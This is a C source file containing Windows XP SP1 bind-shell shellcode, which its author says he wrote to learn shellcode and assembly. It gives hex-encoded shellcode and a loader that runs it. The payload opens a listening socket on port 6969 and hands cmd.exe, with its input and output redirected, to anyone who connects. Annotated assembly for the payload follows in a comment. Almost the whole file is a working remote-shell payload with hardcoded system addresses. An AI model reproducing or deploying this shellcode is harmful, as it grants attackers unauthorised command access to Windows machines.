/* Windows XP SP1 Bind shell by xoclipse xoclipse@cox.net http://xoclipse.fraghosts.net This is some shellcode I made to help me learn shellcode writing and assembly. It will bind and listen on port 6969, and then wait for a user to connect. Once you connect, it will use CreateProcess() to spawn a new shell, and it will redirect stdout, stderr, and stdin, to the user that connected. Just run the app, and connect to localhost:6969 with telnet, and you will have a shell! */ #include int main() { unsigned char vars_and_strings[] = "\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x00\x00\xCC\xCC\xCC\x6B\x65\x72\x6E\x65\x6C\x33\x32\x2E\x64\x6C\x6C\x00\x00\xCC\xCC\xFF\xFF\xFF\xFF\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\xCC\x43\x72\x65\x61\x74\x65\x50\x72\x6F\x63\x65\x73\x73\x41\x00\x00\x61\x63\x63\x65\x70\x74\x00\x00\x6C\x69\x73\x74\x65\x6E\x00\x00\x6D\x65\x6D\x73\x65\x74\x00\x00\x62\x69\x6E\x64\x00\x00\xCC\xCC\xFF\xFF\xFF\xFF\x57\x53\x41\x53\x6F\x63\x6B\x65\x74\x41\x00\x00\x32\xB3\xE7\x77\x61\xD9\xE7\x77\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x57\x53\x41\x53\x74\x61\x72\x74\x75\x70\x00\x00\x4C\x6F\x61\x64\x4C\x69\x62\x72\x61\x72\x79\x41\x00\x00\xCC\xCC\x6D\x73\x76\x63\x72\x74\x2E\x64\x6C\x6C\x00\x00\x77\x73\x32\x5F\x33\x32\x2E\x64\x6C\x6C\x00\x00\x63\x6D\x64\x2E\x65\x78\x65\x00"; unsigned char shellcode[] = "\xE9\x34\x01\x00\x00\x8B\x45\xB4\x8D\x55\xC4\x52\xFF\x75\xC0\xFF\xD0\x81\xEC\x90\x01\x00\x00\x54\x68\x01\x01\x00\x00\xFF\xD0\x81\xC4\x90\x01\x00\x00\x8B\x45\xB4\x8D\x55\xA8\x52\xFF\x75\xC0\xFF\xD0\x6A\x00\x6A\x00\x6A\x00\x6A\x06\x6A\x01\x6A\x02\xFF\xD0\x89\x45\xA4\x8B\x45\xB4\x8D\x55\x9C\x52\xFF\x75\xC0\xFF\xD0\x6A\x00\x6A\x00\x6A\x00\x68\x02\x00\x1B\x39\x8B\xCC\x6A\x10\x51\xFF\x75\xA4\xFF\xD0\x83\xC4\x10\x8B\x45\xB4\x8D\x55\x8C\x52\xFF\x75\xC0\xFF\xD0\x6A\x01\xFF\x75\xA4\xFF\xD0\x8B\x45\xB4\x8D\x55\x84\x52\xFF\x75\xC0\xFF\xD0\x6A\x00\x6A\x00\xFF\x75\xA4\xFF\xD0\x89\x45\xA4\x8B\x45\xB4\x8D\x55\x94\x52\xFF\x75\xBC\xFF\xD0\x8D\x9D\x20\xFF\xFF\xFF\x6A\x44\x6A\x00\x53\xFF\xD0\x83\xC4\x0C\xC7\x03\x44\x00\x00\x00\xC7\x43\x2D\x01\x00\x00\x00\x8B\x4D\xA4\x89\x4B\x38\x89\x4B\x3C\x89\x4B\x40\x8B\x45\xB4\x8D\x95\x74\xFF\xFF\xFF\x52\xFF\xB5\x1C\xFF\xFF\xFF\xFF\xD0\x8D\x8D\x64\xFF\xFF\xFF\x8D\x55\xF8\x51\x53\x6A\x00\x6A\x00\x68\x00\x00\x00\x08\x6A\x01\x6A\x00\x6A\x00\x52\x6A\x00\xFF\xD0\x8B\x45\xB4\x8D\x95\xFC\xFE\xFF\xFF\x52\xFF\xB5\x1C\xFF\xFF\xFF\xFF\xD0\x6A\x00\xFF\xD0\xC3\x8B\x45\xB8\x8D\x55\xEC\x52\xFF\xD0\x89\x45\xC0\x8B\x45\xB8\x8D\x55\xE0\x52\xFF\xD0\x89\x45\xBC\x8B\x45\xB8\x8D\x95\x0C\xFF\xFF\xFF\x52\xFF\xD0\x89\x85\x1C\xFF\xFF\xFF\xC3\x55\x83\xED\x04\xE8\xCC\xFF\xFF\xFF\xE8\xBE\xFE\xFF\xFF\xEB\x00\x5D"; //execute shellcode ((void(*)())(void*)shellcode)(); return 0; } /* char stuff[] = "cmd.exe\0"; //ebp-8 char stuff1[] = "ws2_32.dll\0"; //ebp-20 char stuff2[] = "msvcrt.dll\0"; //ebp-32 char loadlib[] = "LoadLibraryA\0"; //ebp-48 char wsastartup[] = "WSAStartup\0"; //ebp-60 unsigned int winsockhandle = 0xffffffff; //ebp-64 unsigned int msvcrthandle = 0xffffffff; //ebp-68 unsigned int loadlibaddy = 0x77e7d961; //ebp-72 unsigned int getproc_address = 0x77e7b332; //ebp-76 //0x77e7b332 xp sp1 //0x77e7a5fd xp char wsasocket[] = "WSASocketA\0"; //ebp-88 unsigned int sockfd = 0xffffffff; //ebp-92 char bindit[] = "bind\0"; //ebp-100 char memset1[] = "memset\0"; //ebp-108 char listen1[] = "listen\0"; //ebp-116 char accept1[] = "accept\0"; //ebp-124 char createproc[] = "CreateProcessA\0"; //ebp-140 PROCESS_INFORMATION proc_info; //ebp-156 STARTUPINFO start_info; //ebp-224 unsigned int kernel32handle = 0xffffffff; //ebp-228 char kernel321[] = "kernel32.dll\0"; //ebp-244 char exitproc[] = "ExitProcess\0"; //ebp-260 _asm { jmp start startWinsockAndListen: ; ---------------- WSAStartup ---------------------- ; GetProcAddress of WSAStartup, address goes into eax mov eax, dword ptr[ebp-76] lea edx, dword ptr[ebp-60] push edx push dword ptr[ebp-64] call eax ; WSAStartup(MAKEWORD(1,1), &wsad) sub esp, 400 push esp push 00000101h call eax add esp, 400 ; ---------------- WSASocket ------------------------- ; GetProcAddress of WSASocket, address goes into eax mov eax, dword ptr[ebp-76] lea edx, dword ptr[ebp-88] push edx push dword ptr[ebp-64] call eax ; WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0) push 0 push 0 push 0 push 6 ; IPPROTO_TCP push 1 ; SOCK_STREAM push 2 ; PF_INET call eax mov dword ptr[ebp-92], eax ; ------------------ bind ------------------------------ ; GetProcAddress of bind, address goes into eax mov eax, dword ptr[ebp-76] lea edx, dword ptr[ebp-100] push edx push dword ptr[ebp-64] call eax ; bind(sockfd, (struct sockaddr*)&addr, sizeof(struct sockaddr_in)) push 00000000h push 0 push 0 push 391b0002h mov ecx, esp push 16 push ecx push dword ptr[ebp-92] call eax add esp, 16 ; ------------------ listen ---------------------------- ; GetProcAddress of listen, address goes into eax mov eax, dword ptr[ebp-76] lea edx, dword ptr[ebp-116] push edx push dword ptr[ebp-64] call eax ; listen(sockfd, 1) push 00000001 push dword ptr[ebp-92] call eax ; ------------------ accept ---------------------------- ;GetProcAddress of accept, address goes into eax mov eax, dword ptr[ebp-76] lea edx, dword ptr[ebp-124] push edx push dword ptr[ebp-64] call eax ; accept(sockfd, 0, 0) push 00000000 push 00000000 push dword ptr[ebp-92] call eax mov dword ptr[ebp-92], eax ; ------------------- memset and fill in STARTUPINFO structure ----------------------------- ;GetProcAddress of memset, address goes into eax mov eax, dword ptr[ebp-76] lea edx, dword ptr[ebp-108] push edx push dword ptr[ebp-68] call eax ; memset(&start_info, 0, sizeof(STARTUPINFO)); lea ebx, dword ptr[ebp-224] push 68 push 0 push ebx call eax add esp, 12 ; fill startup info structure mov dword ptr[ebx], 00000044h ; sizeof(STARTUPINFO) mov dword ptr[ebx+45], 00000001h ; use std handles mov ecx, dword ptr[ebp-92] mov dword ptr[ebx+56], ecx ; client handles mov dword ptr[ebx+60], ecx mov dword ptr[ebx+64], ecx ;--------------------- CreateProcess ---------------------------------- ; GetProcAddress of CreateProcess mov eax, dword ptr[ebp-76] lea edx, dword ptr[ebp-140] push edx push dword ptr[ebp-228] call eax ; CreateProcess( NULL, "cmd.exe", NULL, NULL, TRUE, 0, 0, NULL, &si, ?); lea ecx, dword ptr[ebp-156] ; address of processinfo lea edx, dword ptr[ebp-8] push ecx push ebx push 00000000 push 00000000 push 08000000h ; make it have no window push 00000001 push 00000000 push 00000000 push edx push 00000000 call eax ;------------------------ ExitProcess ------------------------------- ; GetProcAddress of ExitProcess mov eax, dword ptr[ebp-76] lea edx, dword ptr[ebp-260] push edx push dword ptr[ebp-228] call eax push 0 call eax ret loadLibraries: ; LoadLibrary("ws2_32.dll") mov eax, dword ptr[ebp-72] lea edx, dword ptr[ebp-20] push edx call eax mov dword ptr[ebp-64], eax ; LoadLibrary("msvcrt.dll") mov eax, dword ptr[ebp-72] lea edx, dword ptr[ebp-32] push edx call eax mov dword ptr[ebp-68], eax ; LoadLibrary("kernel32.dll") mov eax, dword ptr[ebp-72] lea edx, dword ptr[ebp-244] push edx call eax mov dword ptr[ebp-228], eax ret start: push ebp ;mov ebp, esp ; put stack pointer into ebp sub ebp, 4 ; get to begginning of variables ; start loading libraries call loadLibraries ; start winsock and listen call startWinsockAndListen jmp end ; finish it end: ;add esp, 150 ; restore esp to original pop ebp } */